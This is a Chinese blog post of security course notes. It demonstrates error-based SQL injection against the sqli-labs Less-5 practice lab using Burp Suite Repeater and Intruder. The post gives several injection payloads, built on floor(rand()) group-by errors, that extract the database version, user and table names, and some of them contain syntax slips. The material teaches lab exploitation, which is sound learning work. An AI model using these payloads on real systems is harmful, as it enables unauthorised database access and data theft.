(2020上半年第10天)小迪网络安全笔记(操作①)SQL参数报错注入演示

最新推荐文章于 2023-08-03 16:57:03 发布
最新推荐文章于 2023-08-03 16:57:03 发布
阅读量481 收藏 1
点赞数 1
分类专栏: 2020全年小迪网络安全笔记 文章标签: 安全 安全漏洞 信息安全 线程安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013630181/article/details/118174674
版权

参考网站:
参考①
参看②
材料:sqlilabs第五关+phpstudypro+burpsuite2021
(没学会burpsuite的先去学burpsuite,上节课教程和链接看完,本教程暂不涉及具体软件操作)
好的我们开始
先用burpsuite抓第五关的包发到repeater
效果:
在这里插入图片描述

下一步我们开始注入(注入之后会显示数据库版本)
注意①:
在这里插入图片描述

这里的空格是用20%代替或者中+代替,如果写空格会被误认为换行,
由于‘一般会用27%代替,但是在这里不会被误认则不用修改。
注意②:
如果这里全部变红就证明这里是一个完整地址
在这里插入图片描述

补充:
注入点数据库版本:

GET/sqlilabs/Less-5/?id=1'+and+(select+i+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

注入点数据库权限:

GET/sqlilabs/Less-5/?id=1'+and+(select+i+from+(select+count(*),concat(user(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

还有一些查询在以前讲过这里也可以用(第七讲函数)
注意:但是报错注入这里没有效果(无回显注入):
例如:http://127.0.0.1/sqlilabs/Less-5/?id=-1’ union select 1,2,3 --+
效果:
在这里插入图片描述

那怎么解决无返回
原:

GET/sqlilabs/Less-5/?id=1'+and+(select+i+from+(select+count(*),concat(user()(把这里改成你要查询的东西就行了),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

改:

GET/sqlilabs/Less-5/?id=1'+and+(select+i+from+(select+count(*),concat(select+table_name+from+information_schema,tables+tableschema=database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

那么多表那么多行那怎么查能,我们用limit来控制:
改:

GET/sqlilabs/Less-5/?id=1'+and+(select+i+from+(select+count(*),concat(select+table_name+from+information_schema,tables+tableschema=database()+limit+0,1,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

由于limit改一次才能得到一次的结果(太慢了),我们可以使用burpsuite的inturder来批量输入
我们直接上图:(具体操作不讲)
在这里插入图片描述

变化的地方需要改的用$$括起来,在plyloads设置变化区间变化类型变换范围和起始值等。
效果:
在这里插入图片描述

注意length后面固定的时候就是没有了(913),出这个报错之外,其余两个也是一样的操作

.白菜白菜大白菜.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
2020小迪安全第十笔记-(信息收集)资产监控拓展
weixin_51566416的博客
12-08 5193
笔记来源视频: 【小迪安全】web安全|渗透测试|网络安全(6个月线上培训全套)_哔哩哔哩_bilibili​​​​​​ 信息收集-资产监控拓展 目录 信息收集-资产监控拓展 #Github 监控 便于收集整理最新 exp或 poc 便于发现相关测试目标的资产 #各种子域名查询 #DNS,备案,证书 #全球节点请求 cdn #黑暗引擎相关搜索 #微信公众号接口获取 #内部群内部应用内部接(社会工程学) ·黑暗引擎(如fofa.so)实现域名接口等收集 ·全自动域名收集枚...
小迪安全学习笔记--第11:web漏洞---必懂知识点
zr1213159840的博客
11-05 2865
课程链接 第11:web漏洞–必懂知识点 前言:本章节将讲解各种WEB层面上的有哪些漏洞类型,具体的漏洞的危害等级,以简要的影响范围测试进行实例分析,思维导图中的漏洞也是后面我们将要学习到的各个知识点,其中针对漏洞的形成原理,如何发现,如何利用将是本章节学习的重点内容! 简要说明以上漏洞的危害 注入:获取数据库中的数据,破坏网站,破坏数据库 文件上传:上传webshell,获取控制权限。提权。上传各种病毒文件。 xss:主要用来获取cookie,拿到后台的权限 文件包含:web服务器的文件被外界浏览导致
小迪安全学习笔记8~10
qq_62023614的博客
08-03 615
安全测试中,信息收集是非常重要的一个环节,此环节的信息将影响到后续的成功几率,掌握信息的多少将决定发现漏洞机会大小,换言之决定着是否能完成目标的测试任务。在安全测试中,若WEB无法取得进展或无WEB的情况下,我们需要借助APP或其他资产在进行信息收集,从而开展后续渗透,那么其中的信息收集尤为重要。
小迪安全学习笔记--第8/9/10:信息收集合集
zr1213159840的博客
10-26 2451
课程链接 第七到十都是信息收集 信息收集 架构,搭建,WAF CDN有无为标准 首先关注的是源码信息:是否是开源的CMS。接着是对方的操作系统,搭建的平台,数据库的类型 接着是站点的搭建:目录站点,端口站点,子域名站点,旁站,C段,类似域名站点 最后是防护的应用:安全够,宝塔,云盾,安骑士等等 假如看到的是APP怎么办? 首先考虑的还是web角度,查找web相关的页面。如果不是web协议的,就需要使用一些工具去提取web页面。如果还是不行的话,就需要进行反编译和逆向了。 CMS识别技术 之前的课中已经有了
小迪安全学习笔记--第5:基础入门---系统及数据库等
zr1213159840的博客
10-25 570
基础入门-系统及数据库等 前言:除去前期讲到过的搭建平台中间件。网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到WEB或服务器的安全,导致网站或服务器权限的获取。 操作系统层面 识别操作系统的常见方法 有网站就网站可以识别,比如windows大小写不敏感,linux大小写敏感 没有网站可以通过相关的软件进行识别,比如nmap,还可以通过ttl来进行判断 https://blog.csdn.net/woshiwumingshi1/article/details/5
2020-V6-小迪安全讲义和相关笔记.zip
08-24
2020.V6小迪安全讲义和相关笔记
小迪安全笔记,详细版本
最新发布
01-23
小迪安全笔记】详细介绍了网络安全领域的多个关键知识点,涵盖了域名、DNS系统、CDN、DNS攻击、脚本语言以及后门等方面。 1. **域名**:域名是互联网上识别计算机或计算机组的名称,由点分隔的名字组成,如...
2021小迪web安全笔记全套.zip
08-16
安全圈子知名讲师 小迪 2021最新教学的课堂笔记 教程还是挺不错的,很好入门。教程也比较新,有新的waf绕过方法以及代码审计,还有新的工具和渗透思维。
小迪基础渗透笔记0-24
05-18
小迪基础渗透笔记0-24
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
2020小迪安全第五笔记-系统及数据库等
weixin_51566416的博客
12-03 2074
笔记来源视频:【小迪安全】web安全|渗透测试|网络安全(6个月线上培训全套)_哔哩哔哩_bilibili #操作系统层面 识别操作系统常见方法 (百度)使用nmap识别操作系统,如:使用nmap识别操作系统:nmap -O 192.168.45.129 通过修改网站目录文件的大小写,由于Linux系统区分大小写,所以变换路径下文件的大小写会导致出现不同的访问结果,而Windows系统不区分大小写。 简要两者区别及识别意义 识别后则在渗透测试过程中要围绕操作系统所支持的方
小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
youngerll的博客
01-03 2131
小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
web漏洞“小迪安全课堂笔记SQL注入
weixin_42902126的博客
03-20 3293
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL注入是什么?注入原理二、使用步骤1.引入库2.读入数据总结参考资料 前言 提示:这里可以添加本文要记录的大概内容: sql注入,总结以下。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL注入是什么? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据.
B站小迪安全第五-系统及数据库
m0_61530426的博客
07-11 217
小迪安全笔记
2020上半年第17(上传-解析漏洞))小迪网络安全笔记
u013630181的博客
06-30 588
2020小迪培训(第10 信息收集-资产监控拓展)
是阿明呐的博客
08-01 2492
信息收集-资产监控拓展 Github 监控 便于收集整理最新 exp 或 poc 便于发现相关测试目标的资产 如何使用(为什么用这个技术?一是官方的ctms是需要收费的,我们可以通过监控github来找到类似的源码,二是在github官网上有着最新的检测漏洞报告) 首先将下面的内部接口放在 PyCharm中,安装所对应的脚本所需的库,即import后面的东西 接着在github注册、在https://sct.ftqq.com/ 微信登录后获取SendKey,在脚本中进行更改
2020上半年第6小迪网络安全笔记操作sqlilabs靶机环境搭建
热门推荐
u013630181的博客
06-14 1万+
材料:phpstudy2018 链接:phpstudy2018 和sqli-labs链接:sqlilabs 第一步:下载解压这个就不细说了 第二步:phpstudy2018打开 这里老师截不上图,我还是说一下吧 切换版本这里我选的是php-5.4.45 ②其他选项选择(网站根目录)打开目录后把sqlilabs下载的rar解压到这个里面 ③也可以直接到文档:D:\php2\PHPTutorial\WWW 第三步: 打开D:\phpStudy\PHPTutorial\WWW\sqli-labs\sql-co
2020全年小迪网络安全笔记(目录)
u013630181的博客
06-09 1万+
2020小迪网络安全 课程体系/目录: 2020上半年70 基础入门…第1 信息收集…第2-3 漏洞分类…第4 漏洞发现…第5 漏洞利用…第6-28 安全开发…第29-38 代码审计…第39-43 权限提升…第44-50 内网安全…第51-56和第59 大赛特训…第67-70 实例任务…第57-58和第63-66 应急响应…第60-62 其他补充… 2020下半年86 基础入门…第1-6 信息收集…第7-10 WEB漏洞…第11-39 JAVA安全…第40-41 漏洞
2020上半年第1(基础入门))小迪网络安全笔记
u013630181的博客
06-09 3921
2020上半年第2小迪网络安全笔记
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.白菜白菜大白菜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值